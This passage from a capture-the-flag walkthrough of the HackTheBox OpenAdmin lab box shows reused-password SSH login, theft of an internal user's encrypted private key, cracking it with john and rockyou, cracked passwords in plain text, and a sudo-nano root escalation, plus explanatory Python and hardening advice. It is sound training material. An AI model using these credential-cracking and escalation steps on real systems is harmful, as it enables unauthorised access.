'context_color' => '#D3DBFF',
),
);
Getting the jimmy user (the ona_sys database password is reused as jimmy's SSH password)
kali@kali:~$ ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 19 07:41:27 UTC 2020
System load: 1.18 Processes: 115
Usage of /: 49.3% of 7.81GB Users logged in: 0
Memory usage: 19% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ ls -al
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.171 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:d78 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:d78 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:0d:78 txqueuelen 1000 (Ethernet)
RX packets 140 bytes 16126 (16.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 103 bytes 23013 (23.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 304 bytes 22008 (22.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 304 bytes 22008 (22.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
jimmy@openadmin:~$
jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-available/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D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-----END RSA PRIVATE KEY-----
</pre>
<pre>-rw------- 1 joanna joanna 1766 Nov 23 16:35 /home/joanna/.ssh/id_rsa
</pre>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Cracking the private key and getting the joanna user
kali@kali:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/pri_ssh
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
kali@kali:~/Desktop$ /usr/share/john/ssh2john.py ~/Desktop/pri_ssh
/home/kali/Desktop/pri_ssh:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$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
kali@kali:~/Desktop$ /usr/share/john/ssh2john.py ~/Desktop/pri_ssh > ~/Desktop/pri_ssh_ok
kali@kali:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/pri_ssh_ok
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (/home/kali/Desktop/pri_ssh)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:03 DONE (2020-04-19 04:40) 0.3278g/s 4702Kp/s 4702Kc/s 4702KC/sa6_123..*7¡Vamos!
Session completed
jimmy n1nj4W4rri0R!
joanna bloodninjas
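Two details of the john run above are worth understanding: the raw PEM file is rejected ("No password hashes loaded") until ssh2john rewrites it into a `$sshng$` line, and the crack finishes in three seconds because john reports "Cost 1 ... 0=MD5/AES". The following is an added example, not part of the original writeup and not john's code: it reproduces the `$sshng$` line layout shown above (cipher id, salt length, salt, data length, data) and the legacy OpenSSL key derivation that makes such keys cheap to brute-force. The cipher id table is an assumption based on the `1` in the page's hash line; the sample key body is constructed filler, not a real key.

```python
"""What ssh2john extracts from a legacy PEM-encrypted key, and the KDF that
makes the passphrase cheap to brute-force.

Added example, not part of the original writeup and not john's code.
SAMPLE_DER is constructed filler; only the IV is the one printed on the page.
"""
import base64
import hashlib
import re

# cipher name -> ($sshng$ id, key length in bytes). Assumption: 0 = 3DES,
# 1 = AES-128-CBC, matching the "1" in the page's $sshng$1$16$... line.
CIPHER_IDS = {"DES-EDE3-CBC": (0, 24), "AES-128-CBC": (1, 16)}


def parse_legacy_pem(pem_text):
    """Return (cipher, iv_hex, der) for a PEM 'RSA PRIVATE KEY' that carries
    Proc-Type/DEK-Info headers. Anything else raises ValueError; feeding such
    a file straight to john is the 'No password hashes loaded' case."""
    if "-----BEGIN RSA PRIVATE KEY-----" not in pem_text:
        raise ValueError("not a legacy PEM RSA private key")
    if "Proc-Type: 4,ENCRYPTED" not in pem_text:
        raise ValueError("key is not passphrase-protected")
    m = re.search(r"DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)", pem_text)
    if not m or m.group(1) not in CIPHER_IDS:
        raise ValueError("unsupported or missing DEK-Info")
    cipher, iv_hex = m.group(1), m.group(2)
    body, in_body = [], False
    for line in pem_text.splitlines():
        line = line.strip()
        if line.startswith("-----BEGIN"):
            in_body = True
        elif line.startswith("-----END"):
            break
        elif in_body and line and ":" not in line:   # skip header lines
            body.append(line)
    return cipher, iv_hex, base64.b64decode("".join(body))


def to_john_hash(pem_text, label):
    """Build the same 'label:$sshng$...' line that ssh2john prints."""
    cipher, iv_hex, der = parse_legacy_pem(pem_text)
    cid, _ = CIPHER_IDS[cipher]
    return "%s:$sshng$%d$%d$%s$%d$%s" % (
        label, cid, len(iv_hex) // 2, iv_hex, len(der), der.hex())


def is_crackable_legacy_key(pem_text):
    try:
        parse_legacy_pem(pem_text)
        return True
    except ValueError:
        return False


def evp_bytes_to_key(passphrase, salt, key_len, count=1):
    """OpenSSL's legacy EVP_BytesToKey with MD5. PEM keys use count=1, so a
    16-byte AES key is one MD5 over passphrase+salt: that is the
    'Cost 1 ... 0=MD5/AES' john reports and why it tries millions of
    candidates per second. An OpenSSH-format key (ssh-keygen -o, bcrypt KDF)
    would be the Cost 2 / high-iteration case instead."""
    out, prev = b"", b""
    while len(out) < key_len:
        d = hashlib.md5(prev + passphrase + salt).digest()
        for _ in range(count - 1):
            d = hashlib.md5(d).digest()
        out += d
        prev = d
    return out[:key_len]


def derive_key(passphrase, iv_hex, cipher):
    """The KDF salt is the first 8 bytes of the IV from the DEK-Info line."""
    _, key_len = CIPHER_IDS[cipher]
    return evp_bytes_to_key(passphrase.encode(), bytes.fromhex(iv_hex)[:8], key_len)


# Constructed sample: the page's IV wrapped around filler bytes.
SAMPLE_IV_HEX = "2AF25344B8391A25A9B318F3FD767D6D"
SAMPLE_DER = bytes(range(48))
SAMPLE_PEM = "\n".join([
    "-----BEGIN RSA PRIVATE KEY-----",
    "Proc-Type: 4,ENCRYPTED",
    "DEK-Info: AES-128-CBC," + SAMPLE_IV_HEX,
    "",
    base64.b64encode(SAMPLE_DER).decode(),
    "-----END RSA PRIVATE KEY-----",
    "",
])

if __name__ == "__main__":
    print(to_john_hash(SAMPLE_PEM, "pri_ssh"))
    print(derive_key("bloodninjas", SAMPLE_IV_HEX, "AES-128-CBC").hex())
```

John verifies a candidate by decrypting the start of the data and checking that it looks like a DER SEQUENCE with valid padding, which is a weak check; that is the reason for its "may emit false positives" note. The defensive takeaway is the mirror image: keys generated with `ssh-keygen -o` (or any recent OpenSSH default) use the bcrypt KDF with a high round count and would not fall to rockyou in three seconds.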
kali@kali:~$ ssh -i ~/Desktop/pri_ssh joanna@10.10.10.171
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/home/kali/Desktop/pri_ssh' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "/home/kali/Desktop/pri_ssh": bad permissions
joanna@10.10.10.171's password:
Permission denied, please try again.
joanna@10.10.10.171's password:
Permission denied, please try again.
joanna@10.10.10.171's password:
kali@kali:~$ ^C
kali@kali:~$ chmod 0600 Desktop/pri_ssh
kali@kali:~$ ssh -i ~/Desktop/pri_ssh joanna@10.10.10.171
Enter passphrase for key '/home/kali/Desktop/pri_ssh':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 19 08:46:51 UTC 2020
System load: 0.1 Processes: 124
Usage of /: 49.6% of 7.81GB Users logged in: 2
Memory usage: 21% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Apr 19 08:12:19 2020 from 10.10.14.71
joanna@openadmin:~$
Getting /root/root.txt
joanna@openadmin:/etc$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
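The sudo rule looks narrow (one binary, one pinned file) but the restriction is on the argument, not on what nano can do once it runs as root: GTFOBins documents that nano's read-file prompt (Ctrl+R, then Ctrl+X to run a command) executes an arbitrary command as the invoking user, which here is root. The following is an added example, not part of the original writeup: a small parser for `sudo -l` output that flags rules whose command is on a list of binaries with documented shell escapes. The list `SHELL_ESCAPE_BINARIES` is this example's own assumption based on GTFOBins entries, the function names are its own, and the sample text is the `sudo -l` output above.

```python
"""Parse `sudo -l` output and flag rules whose command can drop to a shell
even when its argument is pinned.

Added example, not part of the original writeup. SHELL_ESCAPE_BINARIES is an
assumption drawn from GTFOBins' sudo entries; SUDO_L_SAMPLE is the sudo -l
output from this page.
"""
import posixpath
import re

SUDO_L_SAMPLE = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
"""

# Assumption: editors, pagers and interpreters with a documented sudo shell
# escape on GTFOBins. Extend to taste; the point is the basename check.
SHELL_ESCAPE_BINARIES = {
    "nano", "vim", "vi", "less", "more", "man", "awk", "find",
    "python", "python3", "perl",
}

# "(runas) TAG: TAG: /path/to/cmd args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)"
    r"(?P<cmd>/\S+)(?P<args>.*)$")


def parse_sudo_l(text):
    """Return one dict per command rule found after the
    'may run the following commands' line."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd"),
            "args": m.group("args").split(),
        })
    return rules


def shell_escape_rules(rules):
    """Rules where pinning the argument does not help, because the program
    itself offers a run-command or shell feature once it is running."""
    return [r for r in rules
            if posixpath.basename(r["command"]) in SHELL_ESCAPE_BINARIES]


if __name__ == "__main__":
    for r in shell_escape_rules(parse_sudo_l(SUDO_L_SAMPLE)):
        print("shell escape via sudo: %s %s (runas %s, nopasswd=%s)" % (
            r["command"], " ".join(r["args"]), r["runas"], r["nopasswd"]))
```

From a hardening point of view the fix is not a tighter argument list but a different tool: if the intent is to let a user edit one root-owned file, `sudoedit` (which copies the file, runs the editor as the invoking user and copies the result back) gives that without running an editor as root at all.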